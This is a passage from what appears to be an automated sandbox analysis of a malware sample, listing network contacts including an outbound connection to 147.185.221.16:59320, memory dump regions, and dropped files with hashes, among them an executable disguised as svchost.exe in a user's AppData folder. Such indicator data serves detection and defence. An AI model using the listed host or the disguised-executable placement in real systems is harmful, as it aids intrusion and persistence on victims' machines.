US 147.185.221.16:59320 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

memory/3084-0-0x0000026BF9F60000-0x0000026BF9FA2000-memory.dmp

memory/3084-1-0x00007FF80BB53000-0x00007FF80BB55000-memory.dmp

memory/3208-2-0x0000021B7EFC0000-0x0000021B7EFE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bno0zii0.ro2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3208-12-0x00007FF80BB50000-0x00007FF80C611000-memory.dmp

memory/3208-13-0x00007FF80BB50000-0x00007FF80C611000-memory.dmp

memory/3208-14-0x00007FF80BB50000-0x00007FF80C611000-memory.dmp

memory/3208-17-0x00007FF80BB50000-0x00007FF80C611000-memory.dmp

memory/3084-19-0x00007FF80BB53000-0x00007FF80BB55000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 05e991bcf019b487f7ad4e896c77e988
SHA1 f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a
SHA256 cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
SHA512 4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 f6d83cb3ec0cf035c26b86a8009ab714
SHA1 9c2d16be04908f2d28ce66b41ca4487b618534b3
SHA256 2abe8a8f5bc11a760fed80a31be099fc4ffe88cf786ccec2d6b0610877910212
SHA512 9f94dfc2f18ab2130698724a6a6e54c3ddb4f7695b60e71eaee9b2ed0ca09fdc30830bf70de450814260c771674988999b8b94bf78dec6cbb068c8bd073b1696

memory/280-34-0x00000272257A0000-0x00000272257BE000-memory.dmp

memory/280-35-0x0000027227530000-0x0000027227A58000-memory.dmp

memory/280-36-0x000002720B590000-0x000002720B59C000-memory.dmp

memory/4376-37-0x000002232B500000-0x000002232B501000-memory.dmp

memory/4376-38-0x000002232B500000-0x000002232B501000-memory.dmp

memory/4376-39-0x000002232B500000-0x000002232B501000-memory.dmp

memory/4376-44-0x000002232B500000-0x000002232B501000-memory.dmp

memory/4376-49-0x000002232B500000-0x000002232B501000-memory.dmp

memory/4376-48-0x000002232B500000-0x000002232B501000-memory.dmp

memory/4376-47-0x000002232B500000-0x000002232B501000-memory.dmp

memory/4376-46-0x000002232B500000-0x000002232B501000-memory.dmp

memory/4376-45-0x000002232B500000-0x000002232B501000-memory.dmp

memory/4376-43-0x000002232B500000-0x000002232B501000-memory.dmp